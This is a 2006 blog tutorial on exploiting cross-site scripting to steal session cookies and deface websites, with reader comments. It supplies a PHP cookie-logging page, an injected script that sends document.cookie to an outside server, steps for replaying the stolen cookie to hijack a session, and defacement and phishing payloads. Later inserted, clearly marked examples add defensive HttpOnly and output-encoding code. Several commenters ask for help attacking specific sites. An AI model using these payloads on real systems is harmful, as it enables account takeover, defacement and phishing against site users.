Tuesday, December 19, 2006

XSS - Part 2 (Cookie stealing and Defacement)


Please note that this article is for educational purposes only, and is targeted at webmasters who have never seen this scenario. Please do not harm anyone.
Disclaimer: I am not responsible for any damages arising due to methods specified in this page. Webmasters, please fix it ASAP.

In the first part we injected JavaScript successfully and got an alert. Now let us move to step 2: defacing and cookie stealing.

Cookie Stealing using XSS
A cookie is used to manage sessions in browsers. Each person logged in gets a unique cookie; it is like a key to the site. So if you can get hold of this cookie, you have the key to enter the site: the site will welcome you as the person from whom you stole the cookie. Now let us look at how to grab the cookie using cross-site scripting.

For cookie stealing there must be an XSS hole which can be injected through the URL of the page, like the one on propmart.com we discussed in the first part.
Getting a cookie in JavaScript is accomplished with document.cookie; if we can somehow send this to our page we have success. For this trick you will need to set up a page that logs the cookies it receives. The source of this page in PHP would be something like:
grabcookie.php


<?php
$handle=fopen("cookiejar.txt","a");
fputs($handle,"\n".$_GET["cookie"]."\n");
fclose($handle);
?>

Now to get the cookie to this page we would have to embed the following:

<script>
var i=new Image();i.src = "http://myserver.com/myfolders/grabcookie.php?cookie="+document.cookie;
</script>

This code will send the cookies to your server. Embedding the script in the URL can be done as discussed in part 1.

Next, all you have to do is get this cookie (from cookiejar.txt) and set it in your browser. You can add and edit cookies in Firefox with the Cookie Editor plugin.
Just a refresh will certainly get you in, if you are not too late (the cookie expires after some time).
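As an added example, not code from the original post, here is the webmaster-side countermeasure to the cookie-grabbing trick above: issue the session cookie with the HttpOnly attribute, which browsers keep out of document.cookie, so the injected Image request carries no session id; Secure and SameSite limit where the cookie travels. The header strings and cookie values below are constructed for the demo, and buildSessionCookie / auditSessionCookie are hypothetical names, not a PHP or browser API.

```javascript
// Added example (not from the original post): hardening the session cookie
// so that document.cookie cannot read it, plus a small audit of Set-Cookie
// headers. All header strings and values here are constructed for the demo.

// Build a Set-Cookie header for a session id with the defensive attributes.
// HttpOnly: JavaScript (document.cookie) cannot read the cookie, so the
//   grabcookie.php trick in the post receives an empty string.
// Secure: the cookie is only sent over HTTPS.
// SameSite=Lax: the cookie is not attached to most cross-site requests.
function buildSessionCookie(name, value, maxAgeSeconds) {
  if (!/^[A-Za-z0-9_-]+$/.test(name) || !/^[A-Za-z0-9_-]+$/.test(value)) {
    throw new Error("cookie name and value must be plain token characters");
  }
  return `${name}=${value}; Path=/; Max-Age=${maxAgeSeconds}; HttpOnly; Secure; SameSite=Lax`;
}

// Parse one Set-Cookie header into { name, value, attrs }. Attribute names are
// lower-cased; flag attributes such as HttpOnly get the value true.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf("=");
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const value = eq === -1 ? "" : parts[0].slice(eq + 1);
  const attrs = {};
  for (const p of parts.slice(1)) {
    const i = p.indexOf("=");
    const k = (i === -1 ? p : p.slice(0, i)).toLowerCase();
    attrs[k] = i === -1 ? true : p.slice(i + 1);
  }
  return { name, value, attrs };
}

// Audit a Set-Cookie header that carries a session id and return the list of
// findings (empty list means the header has all three protections).
function auditSessionCookie(header) {
  const { attrs } = parseSetCookie(header);
  const findings = [];
  if (attrs.httponly !== true) findings.push("missing HttpOnly: readable via document.cookie");
  if (attrs.secure !== true) findings.push("missing Secure: sent over plain HTTP");
  if (!("samesite" in attrs)) findings.push("missing SameSite: attached to cross-site requests");
  return findings;
}

// Constructed sample headers: a bare 2006-style PHP session cookie and the
// hardened form of the same cookie.
const SAMPLE_HEADERS = [
  "PHPSESSID=abc123; Path=/",
  buildSessionCookie("PHPSESSID", "abc123", 1800),
];

for (const h of SAMPLE_HEADERS) {
  const findings = auditSessionCookie(h);
  console.log(h, "=>", findings.length ? findings.join("; ") : "ok");
}
```

HttpOnly does not close the XSS hole itself; injected script can still make requests as the logged-in user from inside the page. It only removes the easy session-id exfiltration the post describes, so it belongs alongside the output encoding fix, not instead of it.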


Defacing a website

To deface a website, the site must have a system which puts something you submit on their site (like guestbooks or feedback forms). Now if there is an XSS hole in such a page, you can embed the script to deface.

<script src="(location of script)"></script>

- OR -

<script>
document.body.innerHTML="<h1>XSS Defacing</h1>your HTML code here";
</script>

You can either deface the page or craft a fake login page, which results in phishing.
Since it is dangerous to mention any examples, find out yourselves ...
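As an added example, not from the original post, here is the fix on the webmaster side that covers both the guestbook (stored) case above and the URL (reflected) case from the cookie section: encode user-supplied text for the HTML context at the moment it is written into the page, so the post's own innerHTML payload is displayed as text instead of executed. The guestbook entries are constructed for the demo, and renderGuestbookVulnerable / renderGuestbookSafe are hypothetical names for the two render paths, not functions of any real guestbook product.

```javascript
// Added example (not from the original post): output encoding as the fix for
// the guestbook / feedback-form XSS the post describes. Entries below are
// constructed; the second message is the post's own defacement payload.

// Encode the five characters that matter when untrusted text lands in an
// HTML text or attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: user text concatenated straight into the markup,
// which is how the guestbook in the post ends up executing the script.
function renderGuestbookVulnerable(entries) {
  return entries.map((e) => `<li><b>${e.name}</b>: ${e.message}</li>`).join("\n");
}

// Hardened rendering: every user-controlled string is encoded for the HTML
// context it is inserted into. The browser shows "<script>" as literal text.
function renderGuestbookSafe(entries) {
  return entries
    .map((e) => `<li><b>${escapeHtml(e.name)}</b>: ${escapeHtml(e.message)}</li>`)
    .join("\n");
}

// Check a reviewer can run over rendered output: did a script tag survive
// unencoded? (Looks for "<script" followed by whitespace or ">".)
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed guestbook entries; the second one is the defacement script
// quoted in the post.
const ENTRIES = [
  { name: "alice", message: "Nice site!" },
  { name: "mallory", message: '<script>document.body.innerHTML="<h1>XSS Defacing</h1>";</script>' },
];

console.log("vulnerable output executes script:", containsScriptTag(renderGuestbookVulnerable(ENTRIES)));
console.log("hardened output executes script:  ", containsScriptTag(renderGuestbookSafe(ENTRIES)));
console.log(renderGuestbookSafe(ENTRIES));
```

The same encoding applies to the reflected case: a page that echoes a URL parameter must pass it through escapeHtml (or PHP's htmlspecialchars with ENT_QUOTES) before printing it. A Content-Security-Policy header restricting script-src adds a second layer that also stops the external <script src> variant above, but it arrived in browsers years after this post and does not replace encoding.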

Further reading and new XSS holes on
» ha.ckers.org

Eureka?
Let the world know ... post a comment.

6 comments:

Anonymous said...

Hey, how can I inject code into Orkut??
Recently people found some hole; they are transferring the communities of the victim...
Mail me something you know to
redhidus@yahoo.com

Anonymous said...

What all do I need?
A host for grabcookie.php and a link like this:

and the script

That's all?

email: pekel_3@hotmail.com

Anonymous said...

But you don't tell about the use of the worm script; we don't know how to inject it in XSS, as well as how the PHP page uses this script.

Arun Prabhakar said...

The JavaScript sends the cookie to the PHP page, which logs it...
Simple...

Anonymous said...

I got a website which is vulnerable, which gives out an XSS alert. I've created the PHP, but how to insert our script?

Anonymous said...

Thank you for the explanations. It's useful to understand better what is going on.
(no, I do not intend to deface. But to protect. :)